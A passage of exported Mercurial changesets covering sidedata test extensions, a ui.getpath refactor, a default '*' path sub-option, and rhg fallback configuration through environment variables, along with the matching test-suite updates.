- return orig(self, text, transaction, link, p1, p2, *args, **kwargs) - - -def wrap_revisiondata(orig, self, nodeorrev, *args, **kwargs): - text, sd = orig(self, nodeorrev, *args, **kwargs) - if getattr(self, 'sidedatanocheck', False): - return text, sd - if self.version & 0xFFFF != 2: - return text, sd - if nodeorrev != nullrev and nodeorrev != nullid: - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: - raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] - got = hashlib.sha256(text).digest() - if got != expected: - raise RuntimeError('sha256 mismatch') - return text, sd - - -def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): - sidedatacompanion = orig(srcrepo, dstrepo) - addedreqs = dstrepo.requirements - srcrepo.requirements - if requirements.SIDEDATA_REQUIREMENT in addedreqs: - assert sidedatacompanion is None # deal with composition later - - def sidedatacompanion(revlog, rev): - update = {} - revlog.sidedatanocheck = True - try: - text = revlog.revision(rev) - finally: - del revlog.sidedatanocheck - ## let's store some arbitrary data just for testing - # text length - update[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - update[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return False, (), update, 0, 0 - - return sidedatacompanion - - -def extsetup(ui): - extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, '_revisiondata', wrap_revisiondata) - extensions.wrapfunction( - upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion - ) +def reposetup(ui, repo): + repo.register_wanted_sidedata(sidedata.SD_TEST2) + repo.register_wanted_sidedata(sidedata.SD_TEST3) diff --git a/tests/testlib/ext-sidedata-5.py b/tests/testlib/ext-sidedata-5.py new file mode 100644 --- /dev/null +++ b/tests/testlib/ext-sidedata-5.py @@ -0,0 +1,81 @@ +# coding: utf8 +# ext-sidedata-5.py - small extension to test (differently still) the sidedata +# logic +# +# Simulates a server for a simple sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> +# +# This software may be used and distributed according to the terms of the +# GNU General Public License version 2 or any later version. + +from __future__ import absolute_import + +import hashlib +import struct + +from mercurial import ( + extensions, + revlog, +) + + +from mercurial.revlogutils import sidedata as sidedatamod + + +def compute_sidedata_1(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + return sidedata + + +def compute_sidedata_2(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha256 = hashlib.sha256(text).digest() + sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return sidedata + + +def reposetup(ui, repo): + # Sidedata keys happen to be the same as the categories, easier for testing. + for kind in (b'changelog', b'manifest', b'filelog'): + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST1, + (sidedatamod.SD_TEST1,), + compute_sidedata_1, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST2, + (sidedatamod.SD_TEST2,), + compute_sidedata_2, + ) + + # We don't register sidedata computers because we don't care within these + # tests + repo.register_wanted_sidedata(sidedatamod.SD_TEST1) + repo.register_wanted_sidedata(sidedatamod.SD_TEST2) + + +def wrapaddrevision( + orig, self, text, transaction, link, p1, p2, *args, **kwargs +): + if kwargs.get('sidedata') is None: + kwargs['sidedata'] = {} + sd = kwargs['sidedata'] + ## let's store some arbitrary data just for testing + # text length + sd[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + # and sha2 hashes + sha256 = hashlib.sha256(text).digest() + sd[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return orig(self, text, transaction, link, p1, p2, *args, **kwargs) + + +def extsetup(ui): + extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata.py @@ -1,6 +1,6 @@ # ext-sidedata.py - small extension to test the sidedata logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -47,11 +47,12 @@ if self.version & 0xFFFF != 2: return text, sd if nodeorrev != nullrev and nodeorrev != nullid: - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: + cat1 = sd.get(sidedata.SD_TEST1) + if cat1 is not None and len(text) != struct.unpack('>I', cat1)[0]: raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] + expected = sd.get(sidedata.SD_TEST2) got = hashlib.sha256(text).digest() - if got != expected: + if expected is not None and got != expected: raise RuntimeError('sha256 mismatch') return text, sd @@ -86,3 +87,10 @@ extensions.wrapfunction( upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion ) + + +def reposetup(ui, repo): + # We don't register sidedata computers because we don't care within these + # tests + repo.register_wanted_sidedata(sidedata.SD_TEST1) + repo.register_wanted_sidedata(sidedata.SD_TEST2) # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1615802222 -3600 # Mon Mar 15 10:57:02 2021 +0100 # Node ID 0732a72642260a0d86b941efc583e578c8657db4 # Parent ba8e508a8e69284b70c857c616a299887770ef83 configitems: add TODOs blocking the move out of experimental for revlogv2 These are the todos so far, we probably will have more, but we might as well list them while they're fresh in our minds. Differential Revision: https://phab.mercurial-scm.org/D10216 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1297,6 +1297,14 @@ b'use-persistent-nodemap', default=False, ) +# TODO needs to grow a docket file to at least store the last offset of the data +# file when rewriting sidedata. +# Will also need a way of dealing with garbage data if we allow rewriting +# *existing* sidedata. +# Exchange-wise, we will also need to do something more efficient than keeping +# references to the affected revlogs, especially memory-wise when rewriting +# sidedata. +# Also... compress the sidedata? (this should be coming very soon) coreconfigitem( b'format', b'exp-revlogv2.2', # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615480009 -3600 # Thu Mar 11 17:26:49 2021 +0100 # Node ID 66fb045521223684373a4b47d88b9a1f6ee5b704 # Parent 0732a72642260a0d86b941efc583e578c8657db4 ui: pass a `ui` object to `paths.getpath` I want to introduce more path's suboption and make it possible to use default value for them. Processing theses sub-options might result in warnings. We need a `ui` object to issue such warnings. To make things simpler, we add an helper method on the `ui` object. Differential Revision: https://phab.mercurial-scm.org/D10162 diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -1407,7 +1407,7 @@ opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.Abort( b'default repository not configured!', diff --git a/hgext/infinitepush/__init__.py b/hgext/infinitepush/__init__.py --- a/hgext/infinitepush/__init__.py +++ b/hgext/infinitepush/__init__.py @@ -837,7 +837,7 @@ exchange, b'_localphasemove', _phasemove ) # Copy-paste from `push` command - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.Abort( _(b'default repository not configured!'), diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4946,7 +4946,7 @@ """ # hg._outgoing() needs to re-resolve the path in order to handle #branch # style URLs, so don't overwrite dest. - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.ConfigError( _(b'default repository not configured!'), @@ -5680,7 +5680,7 @@ # this lets simultaneous -r, -b options continue working opts.setdefault(b'rev', []).append(b"null") - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.ConfigError( _(b'default repository not configured!'), diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1317,7 +1317,7 @@ def _outgoing(ui, repo, dest, opts): - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.Abort( _(b'default repository not configured!'), diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1826,9 +1826,9 @@ l and getstring(l[0], _(b"outgoing requires a repository path")) or b'' ) if not dest: - # ui.paths.getpath() explicitly tests for None, not just a boolean + # ui.getpath() explicitly tests for None, not just a boolean dest = None - path = repo.ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = repo.ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.Abort( _(b'default repository not configured!'), diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -1031,7 +1031,7 @@ def expandpath(self, loc, default=None): """Return repository location relative to cwd or from [paths]""" try: - p = self.paths.getpath(loc) + p = self.getpath(loc) if p: return p.rawloc except error.RepoError: @@ -1039,7 +1039,7 @@ if default: try: - p = self.paths.getpath(default) + p = self.getpath(default) if p: return p.rawloc except error.RepoError: @@ -1051,6 +1051,13 @@ def paths(self): return paths(self) + def getpath(self, *args, **kwargs): + """see paths.getpath for details + + This method exist as `getpath` need a ui for potential warning message. + """ + return self.paths.getpath(self, *args, **kwargs) + @property def fout(self): return self._fout @@ -2190,7 +2197,7 @@ loc, sub = ui.configsuboptions(b'paths', name) self[name] = path(ui, name, rawloc=loc, suboptions=sub) - def getpath(self, name, default=None): + def getpath(self, ui, name, default=None): """Return a ``path`` from a string, falling back to default. ``name`` can be a named path or locations. Locations are filesystem @@ -2222,8 +2229,8 @@ except KeyError: # Try to resolve as a local path or URI. try: - # We don't pass sub-options in, so no need to pass ui instance. - return path(None, None, rawloc=name) + # we pass the ui instance are warning might need to be issued + return path(ui, None, rawloc=name) except ValueError: raise error.RepoError(_(b'repository %s does not exist') % name) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615458174 -3600 # Thu Mar 11 11:22:54 2021 +0100 # Node ID e3f15c5535220d3b489aa696f63ecd6b7c618e09 # Parent 66fb045521223684373a4b47d88b9a1f6ee5b704 paths: add a `*` special path to define default sub option Differential Revision: https://phab.mercurial-scm.org/D10163 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -2190,12 +2190,16 @@ def __init__(self, ui): dict.__init__(self) + _path, base_sub_options = ui.configsuboptions(b'paths', b'*') for name, loc in ui.configitems(b'paths', ignoresub=True): # No location is the same as not existing. if not loc: continue loc, sub = ui.configsuboptions(b'paths', name) - self[name] = path(ui, name, rawloc=loc, suboptions=sub) + sub_opts = base_sub_options.copy() + sub_opts.update(sub) + self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts) + self._default_sub_opts = base_sub_options def getpath(self, ui, name, default=None): """Return a ``path`` from a string, falling back to default. @@ -2230,7 +2234,9 @@ # Try to resolve as a local path or URI. try: # we pass the ui instance are warning might need to be issued - return path(ui, None, rawloc=name) + return path( + ui, None, rawloc=name, suboptions=self._default_sub_opts + ) except ValueError: raise error.RepoError(_(b'repository %s does not exist') % name) diff --git a/tests/test-default-push.t b/tests/test-default-push.t --- a/tests/test-default-push.t +++ b/tests/test-default-push.t @@ -146,4 +146,40 @@ ^ here) [10] +default :pushrev is taking in account + + $ echo babar > foo + $ hg ci -m 'extra commit' + $ hg up '.^' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ echo celeste > foo + $ hg ci -m 'extra other commit' + created new head + $ cat >> .hg/hgrc << EOF + > [paths] + > other = file://$WD/../pushurldest + > *:pushrev = . + > EOF + $ hg push other + pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + $ hg push file://$WD/../pushurldest + pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) + searching for changes + no changes found + [1] + +for comparison, pushing everything would give different result + + $ hg push file://$WD/../pushurldest --rev 'all()' + pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob) + searching for changes + abort: push creates new remote head 1616ce7cecc8 + (merge or see 'hg help push' for details about pushing new heads) + [20] + $ cd .. # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615571132 -3600 # Fri Mar 12 18:45:32 2021 +0100 # Node ID 08a35cec14d426ceb54bd7bc45a459182d92c66a # Parent e3f15c5535220d3b489aa696f63ecd6b7c618e09 rhg: Add environment variables for fallback configuration For the `rust-tests.py --rhg` we want every `hg` command in tests to run `rhg` with fallback enabled, but other methods of setting configuration are limited or disruptive as discussed in code comment. Differential Revision: https://phab.mercurial-scm.org/D10186 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -78,9 +78,27 @@ if opt_rc_path.is_none() { config.add_system_config()? } + config.add_for_environment_variable("EDITOR", b"ui", b"editor"); config.add_for_environment_variable("VISUAL", b"ui", b"editor"); config.add_for_environment_variable("PAGER", b"pager", b"pager"); + + // These are set by `run-tests.py --rhg` to enable fallback for the + // entire test suite. Alternatives would be setting configuration + // through `$HGRCPATH` but some tests override that, or changing the + // `hg` shell alias to include `--config` but that disrupts tests that + // print command lines and check expected output. + config.add_for_environment_variable( + "RHG_ON_UNSUPPORTED", + b"rhg", + b"on-unsupported", + ); + config.add_for_environment_variable( + "RHG_FALLBACK_EXECUTABLE", + b"rhg", + b"fallback-executable", + ); + // HGRCPATH replaces user config if opt_rc_path.is_none() { config.add_user_config()? # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614721330 -3600 # Tue Mar 02 22:42:10 2021 +0100 # Node ID a6553ba1c59896ce5c4717e8b7b5314705690dd7 # Parent 08a35cec14d426ceb54bd7bc45a459182d92c66a tests: Enable rhg fallback to Python by default in tests This premise of `run-tests.py --rhg`: fallback should make `rhg` behave the same as `hg`, except faster in some cases. To test run the whole test suite with installed `rhg` as `hg` and with fallback enabled. Differential Revision: https://phab.mercurial-scm.org/D10187 diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -967,7 +967,6 @@ slowtimeout=None, usechg=False, chgdebug=False, - rhg_fallback_exe=None, useipv6=False, ): """Create a test from parameters. @@ -1025,7 +1024,6 @@ self._hgcommand = hgcommand or b'hg' self._usechg = usechg self._chgdebug = chgdebug - self._rhg_fallback_exe = rhg_fallback_exe self._useipv6 = useipv6 self._aborted = False @@ -1508,12 +1506,6 @@ hgrc.write(b'ipv6 = %r\n' % self._useipv6) hgrc.write(b'server-header = testing stub value\n') - if self._rhg_fallback_exe: - hgrc.write(b'[rhg]\n') - hgrc.write( - b'fallback-executable = %s\n' % self._rhg_fallback_exe - ) - for opt in self._extraconfigopts: section, key = _sys2bytes(opt).split(b'.', 1) assert b'=' in key, ( @@ -2999,7 +2991,6 @@ self._coveragefile = None self._createdfiles = [] self._hgcommand = None - self._rhg_fallback_exe = None self._hgpath = None self._portoffset = 0 self._ports = {} @@ -3140,10 +3131,17 @@ chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg)) self._hgcommand = os.path.basename(self.options.with_chg) - # set fallback executable path, then replace "hg" command by "rhg" + # configure fallback and replace "hg" command by "rhg" rhgbindir = self._bindir if self.options.rhg or self.options.with_rhg: - self._rhg_fallback_exe = os.path.join(self._bindir, self._hgcommand) + # Affects configuration. Alternatives would be setting configuration through + # `$HGRCPATH` but some tests override that, or changing `_hgcommand` to include + # `--config` but that disrupts tests that print command lines and check expected + # output. + osenvironb[b'RHG_ON_UNSUPPORTED'] = b'fallback' + osenvironb[b'RHG_FALLBACK_EXECUTABLE'] = os.path.join( + self._bindir, self._hgcommand + ) if self.options.rhg: self._hgcommand = b'rhg' elif self.options.with_rhg: @@ -3477,7 +3475,6 @@ hgcommand=self._hgcommand, usechg=bool(self.options.with_chg or self.options.chg), chgdebug=self.options.chg_debug, - rhg_fallback_exe=self._rhg_fallback_exe, useipv6=useipv6, **kwds ) diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -11,8 +11,10 @@ > fi > } + $ NO_FALLBACK="env RHG_ON_UNSUPPORTED=abort" + Unimplemented command - $ rhg unimplemented-command + $ $NO_FALLBACK rhg unimplemented-command unsupported feature: error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context USAGE: @@ -25,35 +27,35 @@ [252] Finding root - $ rhg root + $ $NO_FALLBACK rhg root abort: no repository found in '$TESTTMP' (.hg not found)! [255] $ hg init repository $ cd repository - $ rhg root + $ $NO_FALLBACK rhg root $TESTTMP/repository Reading and setting configuration $ echo "[ui]" >> $HGRCPATH $ echo "username = user1" >> $HGRCPATH - $ rhg config ui.username + $ $NO_FALLBACK rhg config ui.username user1 $ echo "[ui]" >> .hg/hgrc $ echo "username = user2" >> .hg/hgrc - $ rhg config ui.username + $ $NO_FALLBACK rhg config ui.username user2 - $ rhg --config ui.username=user3 config ui.username + $ $NO_FALLBACK rhg --config ui.username=user3 config ui.username user3 Unwritable file descriptor - $ rhg root > /dev/full + $ $NO_FALLBACK rhg root > /dev/full abort: No space left on device (os error 28) [255] Deleted repository $ rm -rf `pwd` - $ rhg root + $ $NO_FALLBACK rhg root abort: $ENOENT$: current directory [255] @@ -68,7 +70,7 @@ > hg commit -m "commit $i" -q Listing tracked files from root - $ rhg files + $ $NO_FALLBACK rhg files file1 file2 file3 @@ -76,13 +78,13 @@ Listing tracked files from subdirectory $ mkdir -p path/to/directory $ cd path/to/directory - $ rhg files + $ $NO_FALLBACK rhg files ../../../file1 ../../../file2 ../../../file3 Listing tracked files through broken pipe - $ rhg files | head -n 1 + $ $NO_FALLBACK rhg files | head -n 1 ../../../file1 Debuging data in inline index @@ -95,20 +97,20 @@ > hg add file-$i > hg commit -m "Commit $i" -q > done - $ rhg debugdata -c 2 + $ $NO_FALLBACK rhg debugdata -c 2 8d0267cb034247ebfa5ee58ce59e22e57a492297 test 0 0 file-3 Commit 3 (no-eol) - $ rhg debugdata -m 2 + $ $NO_FALLBACK rhg debugdata -m 2 file-1\x00b8e02f6433738021a065f94175c7cd23db5f05be (esc) file-2\x005d9299349fc01ddd25d0070d149b124d8f10411e (esc) file-3\x002661d26c649684b482d10f91960cc3db683c38b4 (esc) Debuging with full node id - $ rhg debugdata -c `hg log -r 0 -T '{node}'` + $ $NO_FALLBACK rhg debugdata -c `hg log -r 0 -T '{node}'` d1d1c679d3053e8926061b6f45ca52009f011e3f test 0 0 @@ -124,16 +126,16 @@ cf8b83f14ead62b374b6e91a0e9303b85dfd9ed7 91c6f6e73e39318534dc415ea4e8a09c99cd74d6 6ae9681c6d30389694d8701faf24b583cf3ccafe - $ rhg files -r cf8b83 + $ $NO_FALLBACK rhg files -r cf8b83 file-1 file-2 file-3 - $ rhg cat -r cf8b83 file-2 + $ $NO_FALLBACK rhg cat -r cf8b83 file-2 2 - $ rhg cat -r c file-2 + $ $NO_FALLBACK rhg cat -r c file-2 abort: ambiguous revision identifier c [255] - $ rhg cat -r d file-2 + $ $NO_FALLBACK rhg cat -r d file-2 2 Cat files @@ -144,37 +146,36 @@ $ echo "original content" > original $ hg add original $ hg commit -m "add original" original - $ rhg cat -r 0 original + $ $NO_FALLBACK rhg cat -r 0 original original content Cat copied file should not display copy metadata $ hg copy original copy_of_original $ hg commit -m "add copy of original" - $ rhg cat -r 1 copy_of_original + $ $NO_FALLBACK rhg cat -r 1 copy_of_original original content Fallback to Python - $ rhg cat original + $ $NO_FALLBACK rhg cat original unsupported feature: `rhg cat` without `--rev` / `-r` [252] - $ FALLBACK="--config rhg.on-unsupported=fallback" - $ rhg cat original $FALLBACK + $ rhg cat original original content - $ rhg cat original $FALLBACK --config rhg.fallback-executable=false + $ rhg cat original --config rhg.fallback-executable=false [1] - $ rhg cat original $FALLBACK --config rhg.fallback-executable=hg-non-existent + $ rhg cat original --config rhg.fallback-executable=hg-non-existent tried to fall back to a 'hg-non-existent' sub-process but got error $ENOENT$ unsupported feature: `rhg cat` without `--rev` / `-r` [252] - $ rhg cat original $FALLBACK --config rhg.fallback-executable="$RHG" + $ rhg cat original --config rhg.fallback-executable="$RHG" Blocking recursive fallback. The 'rhg.fallback-executable = */rust/target/release/rhg' config points to `rhg` itself. (glob) unsupported feature: `rhg cat` without `--rev` / `-r` [252] Requirements - $ rhg debugrequirements + $ $NO_FALLBACK rhg debugrequirements dotencode fncache generaldelta @@ -183,20 +184,20 @@ store $ echo indoor-pool >> .hg/requires - $ rhg files + $ $NO_FALLBACK rhg files unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] - $ rhg cat -r 1 copy_of_original + $ $NO_FALLBACK rhg cat -r 1 copy_of_original unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] - $ rhg debugrequirements + $ $NO_FALLBACK rhg debugrequirements unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] $ echo -e '\xFF' >> .hg/requires - $ rhg debugrequirements + $ $NO_FALLBACK rhg debugrequirements abort: corrupted repository: parse error in 'requires' file [255] @@ -205,7 +206,7 @@ $ rm -rf repository $ hg init repository $ cd repository - $ rhg debugrequirements | grep nodemap + $ $NO_FALLBACK rhg debugrequirements | grep nodemap [1] $ hg debugbuilddag .+5000 --overwritten-file --config "storage.revlog.nodemap.mode=warn" $ hg id -r tip @@ -213,14 +214,14 @@ $ ls .hg/store/00changelog* .hg/store/00changelog.d .hg/store/00changelog.i - $ rhg files -r c3ae8dec9fad + $ $NO_FALLBACK rhg files -r c3ae8dec9fad of $ cd $TESTTMP $ rm -rf repository $ hg --config format.use-persistent-nodemap=True init repository $ cd repository - $ rhg debugrequirements | grep nodemap + $ $NO_FALLBACK rhg debugrequirements | grep nodemap persistent-nodemap $ hg debugbuilddag .+5000 --overwritten-file --config "storage.revlog.nodemap.mode=warn" $ hg id -r tip @@ -232,9 +233,9 @@ .hg/store/00changelog.n Specifying revisions by changeset ID - $ rhg files -r c3ae8dec9fad + $ $NO_FALLBACK rhg files -r c3ae8dec9fad of - $ rhg cat -r c3ae8dec9fad of + $ $NO_FALLBACK rhg cat -r c3ae8dec9fad of r5000 Crate a shared repository @@ -254,9 +255,9 @@ And check that basic rhg commands work with sharing - $ rhg files -R repo2 + $ $NO_FALLBACK rhg files -R repo2 repo2/a - $ rhg -R repo2 cat -r 0 repo2/a + $ $NO_FALLBACK rhg -R repo2 cat -r 0 repo2/a a Same with relative sharing @@ -265,9 +266,9 @@ updating working directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ rhg files -R repo3 + $ $NO_FALLBACK rhg files -R repo3 repo3/a - $ rhg -R repo3 cat -r 0 repo3/a + $ $NO_FALLBACK rhg -R repo3 cat -r 0 repo3/a a Same with share-safe @@ -290,9 +291,9 @@ And check that basic rhg commands work with sharing $ cd repo5 - $ rhg files + $ $NO_FALLBACK rhg files a - $ rhg cat -r 0 a + $ $NO_FALLBACK rhg cat -r 0 a a The blackbox extension is supported @@ -301,7 +302,7 @@ $ echo "blackbox =" >> $HGRCPATH $ echo "[blackbox]" >> $HGRCPATH $ echo "maxsize = 1" >> $HGRCPATH - $ rhg files > /dev/null + $ $NO_FALLBACK rhg files > /dev/null $ cat .hg/blackbox.log ????/??/?? ??:??:??.??? * @d3873e73d99ef67873dac33fbcc66268d5d2b6f4 (*)> (rust) files exited 0 after 0.??? seconds (glob) $ cat .hg/blackbox.log.1 # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614790854 -3600 # Wed Mar 03 18:00:54 2021 +0100 # Node ID 78e6700ab009172adc3f92285ec019a41a230514 # Parent a6553ba1c59896ce5c4717e8b7b5314705690dd7 tests: Add `rhg` and `no-rhg` for #require and #if in .t files With this we can allow some small differences in expected output between Rust-based and Python-based code paths. Differential Revision: https://phab.mercurial-scm.org/D10096 diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -188,6 +188,11 @@ return 'CHGHG' in os.environ +@check("rhg", "running with rhg as 'hg'") +def has_rhg(): + return 'RHG_INSTALLED_AS_HG' in os.environ + + @check("cvs", "cvs client/server") def has_cvs(): re = br'Concurrent Versions System.*?server' diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -3134,6 +3134,8 @@ # configure fallback and replace "hg" command by "rhg" rhgbindir = self._bindir if self.options.rhg or self.options.with_rhg: + # Affects hghave.py + osenvironb[b'RHG_INSTALLED_AS_HG'] = b'1' # Affects configuration. Alternatives would be setting configuration through # `$HGRCPATH` but some tests override that, or changing `_hgcommand` to include # `--config` but that disrupts tests that print command lines and check expected diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -1,15 +1,4 @@ -#require rust - -Define an rhg function that will only run if rhg exists - $ RHG="$RUNTESTDIR/../rust/target/release/rhg" - $ rhg() { - > if [ -f "$RHG" ]; then - > "$RHG" "$@" - > else - > echo "skipped: Cannot find rhg. Try to run cargo build in rust/rhg." - > exit 80 - > fi - > } +#require rhg $ NO_FALLBACK="env RHG_ON_UNSUPPORTED=abort" @@ -169,8 +158,8 @@ unsupported feature: `rhg cat` without `--rev` / `-r` [252] - $ rhg cat original --config rhg.fallback-executable="$RHG" - Blocking recursive fallback. The 'rhg.fallback-executable = */rust/target/release/rhg' config points to `rhg` itself. (glob) + $ rhg cat original --config rhg.fallback-executable=rhg + Blocking recursive fallback. The 'rhg.fallback-executable = rhg' config points to `rhg` itself. unsupported feature: `rhg cat` without `--rev` / `-r` [252] # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614723503 -3600 # Tue Mar 02 23:18:23 2021 +0100 # Node ID df247f58ecee02205bd0b3e5b8d3c31cdb83df03 # Parent 78e6700ab009172adc3f92285ec019a41a230514 rhg: Fall back to Python for unsupported revset syntax rhg only supports a small subset of the syntax. On parse error, this gives Python a chance instead of aborting immediately. Differential Revision: https://phab.mercurial-scm.org/D10097 diff --git a/rust/hg-core/src/revset.rs b/rust/hg-core/src/revset.rs --- a/rust/hg-core/src/revset.rs +++ b/rust/hg-core/src/revset.rs @@ -2,6 +2,7 @@ //! //! <https://www.mercurial-scm.org/repo/hg/help/revsets> +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::changelog::Changelog; use crate::revlog::revlog::{Revlog, RevlogError}; @@ -28,7 +29,10 @@ // TODO: support for the rest of the language here. - Err(RevlogError::InvalidRevision) + Err( + HgError::unsupported(format!("cannot parse revset '{}'", input)) + .into(), + ) } /// Resolve the small subset of the language suitable for revlogs other than # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614793102 -3600 # Wed Mar 03 18:38:22 2021 +0100 # Node ID 92e3cfd63096be23bdf4da0682b70de501a54789 # Parent df247f58ecee02205bd0b3e5b8d3c31cdb83df03 rhg: Fall back to Python on unsupported `rhg config <section>` Printing an entire section (as opposed to a single value with `rhg config foo.bar`) is not supported yet in Rust only. Differential Revision: https://phab.mercurial-scm.org/D10098 diff --git a/rust/rhg/src/commands/config.rs b/rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/config.rs +++ b/rust/rhg/src/commands/config.rs @@ -27,7 +27,7 @@ .expect("missing required CLI argument") .as_bytes() .split_2(b'.') - .ok_or_else(|| HgError::abort(""))?; + .ok_or_else(|| HgError::unsupported("hg config <section>"))?; let value = invocation.config.get(section, name).unwrap_or(b""); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614793217 -3600 # Wed Mar 03 18:40:17 2021 +0100 # Node ID 28a54c128e82b576f187d3b3f88a2cf2284777e2 # Parent 92e3cfd63096be23bdf4da0682b70de501a54789 rhg: Align "malformed --config" error message with Python Differences in error message formatting can cause tests to fail. Differential Revision: https://phab.mercurial-scm.org/D10099 diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -74,7 +74,7 @@ layer.add(section, item, value, None); } else { Err(HgError::abort(format!( - "malformed --config option: \"{}\" \ + "malformed --config option: '{}' \ (use --config section.name=value)", String::from_utf8_lossy(arg), )))? # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614793385 -3600 # Wed Mar 03 18:43:05 2021 +0100 # Node ID 562a676e255a5db7e246daea47bc7d7f3cc8746b # Parent 28a54c128e82b576f187d3b3f88a2cf2284777e2 rhg: Print non-absolutized path in "repository {} not found" errors … like Python does. Differences in ouput can cause tests to fail. Differential Revision: https://phab.mercurial-scm.org/D10100 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -58,9 +58,9 @@ if let Some(root) = explicit_path { // Having an absolute path isn’t necessary here but can help code // elsewhere - let root = current_dir()?.join(root); - if root.join(".hg").is_dir() { - Self::new_at_path(root, config) + let absolute_root = current_dir()?.join(root); + if absolute_root.join(".hg").is_dir() { + Self::new_at_path(absolute_root, config) } else { Err(RepoError::NotFound { at: root.to_owned(), # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614794526 -3600 # Wed Mar 03 19:02:06 2021 +0100 # Node ID 